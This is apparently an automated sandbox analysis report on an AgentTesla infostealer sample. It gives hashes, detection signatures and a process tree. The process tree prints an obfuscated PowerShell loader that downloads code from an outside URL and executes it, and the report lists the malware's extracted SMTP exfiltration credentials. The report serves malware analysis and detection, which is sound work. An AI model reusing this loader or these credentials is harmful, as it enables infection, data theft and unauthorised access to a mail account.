Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20231215-en
  • resource tags

    arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
  • submitted
    13/02/2024, 05:38

General

  • Target

    d9002ae6089045126350070c7b0790b4eb478e9b764bfdae3ee61e2e62a0e277.wsf

  • Size

    2KB

  • MD5

    380c9e85f6960add801843076c33ec3b

  • SHA1

    53f4ebaa47e325b25feaf22211dcff9223dc2ccc

  • SHA256

    d9002ae6089045126350070c7b0790b4eb478e9b764bfdae3ee61e2e62a0e277

  • SHA512

    88e6a1f62735e5116041dfa23c0a3743f3f31b6372c4af698323e7eddd028eff7d10bb83b883bda6e3aa2171827efb661eacd7e7d7db4ca8891919b134986e35

Malware Config

Extracted

Credentials

  • Protocol:
    smtp
  • Host:
    mail.knoow.net
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    americanboy21@

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Detect packed .NET executables. Mostly AgentTeslaV4. 6 IoCs
  • Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 6 IoCs
  • Detects executables manipulated with Fody 1 IoCs
  • Detects executables packed with Costura DotNetGuard 1 IoCs
  • Detects executables referencing Windows vault credential objects. Observed in infostealers 6 IoCs
  • Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 6 IoCs
  • Detects executables referencing many email and collaboration clients. Observed in information stealers 6 IoCs
  • Detects executables referencing many file transfer clients. Observed in information stealers 6 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 22 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d9002ae6089045126350070c7b0790b4eb478e9b764bfdae3ee61e2e62a0e277.wsf"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2180
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $rt='x','e','I';[Array]::Reverse($rt);sal z ($rt -join '');$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$tpg='[void','] [Syst','em.Refle','ction.Asse','mbly]::LoadWi','thPartialName(''Microsoft.VisualBasic'')';z($tpg -join '');do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty55='(New-','Obje','ct Ne','t.We','bCli','ent)';$tty=z($tty55 -join '');$tty;$rot='Down','load','Str','ing';$rotJ=($rot -join '');$bnt='https','://didaktik-labor.de/mx1.jpg';$bntJ=($bnt -join '');$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,$rotJ,[Microsoft.VisualBasic.CallType]::Method,$bntJ);z($mv)
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2436
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3052

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    0094f2ccd2eb50d551e9ca9fe86e5199

    SHA1

    5d1787d9f096014213b688cba0df97b4b1f29f96

    SHA256

    c6883da1acb5b786bb382796e23a86c88411015d6f8958bb99c16475c51a647e

    SHA512

    fb4d24ced284ecb6ee82a4e01272f3f82548c088ad6b30e48d4edb864400766a37ed488e7b140872566ccd877e5865e2e7db9c2072814b53fc4a68c45b767973

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    344B

    MD5

    fbcfc28e9449192926b08a0a2101ce39

    SHA1

    67f5478ab434d0fa750ee7fb62801d0d15c322f4

    SHA256

    42b5d71678194b55e4786badb22dfeb07972a201777d32a586b8712a4ebfca2b

    SHA512

    e93f4174cc200d9dbd6ee3a01dc70d7900e602bd55a8536c35af4c0dececb0b815a20a5d83d5a2048c02c912919c68ba05ab86e95025ca912123197b08693d25

  • C:\Users\Admin\AppData\Local\Temp\Cab27AE.tmp

    Filesize

    65KB

    MD5

    ac05d27423a85adc1622c714f2cb6184

    SHA1

    b0fe2b1abddb97837ea0195be70ab2ff14d43198

    SHA256

    c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

    SHA512

    6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

  • C:\Users\Admin\AppData\Local\Temp\Tar282E.tmp

    Filesize

    171KB

    MD5

    9c0c641c06238516f27941aa1166d427

    SHA1

    64cd549fb8cf014fcd9312aa7a5b023847b6c977

    SHA256

    4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

    SHA512

    936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

  • memory/2436-9-0x0000000002BB0000-0x0000000002C30000-memory.dmp

    Filesize

    512KB

  • memory/2436-10-0x0000000002BB0000-0x0000000002C30000-memory.dmp

    Filesize

    512KB

  • memory/2436-8-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2436-11-0x0000000002BB0000-0x0000000002C30000-memory.dmp

    Filesize

    512KB

  • memory/2436-84-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

  • memory/2436-7-0x0000000002BB0000-0x0000000002C30000-memory.dmp

    Filesize

    512KB

  • memory/2436-5-0x0000000001E20000-0x0000000001E28000-memory.dmp

    Filesize

    32KB

  • memory/2436-73-0x0000000002B90000-0x0000000002BB6000-memory.dmp

    Filesize

    152KB

  • memory/2436-75-0x000000001BD90000-0x000000001BDA8000-memory.dmp

    Filesize

    96KB

  • memory/2436-74-0x0000000002B60000-0x0000000002B6C000-memory.dmp

    Filesize

    48KB

  • memory/2436-4-0x000000001B650000-0x000000001B932000-memory.dmp

    Filesize

    2.9MB

  • memory/2436-6-0x000007FEF5850000-0x000007FEF61ED000-memory.dmp

    Filesize

    9.6MB

  • memory/3052-80-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

    Filesize

    4KB

  • memory/3052-78-0x0000000000400000-0x0000000000442000-memory.dmp

    Filesize

    264KB

  • memory/3052-77-0x0000000000400000-0x0000000000442000-memory.dmp

    Filesize

    264KB

  • memory/3052-79-0x0000000000400000-0x0000000000442000-memory.dmp

    Filesize

    264KB

  • memory/3052-83-0x0000000000400000-0x0000000000442000-memory.dmp

    Filesize

    264KB

  • memory/3052-76-0x0000000000400000-0x0000000000442000-memory.dmp

    Filesize

    264KB

  • memory/3052-86-0x0000000000400000-0x0000000000442000-memory.dmp

    Filesize

    264KB

  • memory/3052-87-0x00000000743B0000-0x0000000074A9E000-memory.dmp

    Filesize

    6.9MB

  • memory/3052-88-0x0000000004A10000-0x0000000004A50000-memory.dmp

    Filesize

    256KB

  • memory/3052-81-0x0000000000400000-0x0000000000442000-memory.dmp

    Filesize

    264KB

  • memory/3052-124-0x00000000743B0000-0x0000000074A9E000-memory.dmp

    Filesize

    6.9MB

  • memory/3052-125-0x0000000004A10000-0x0000000004A50000-memory.dmp

    Filesize

    256KB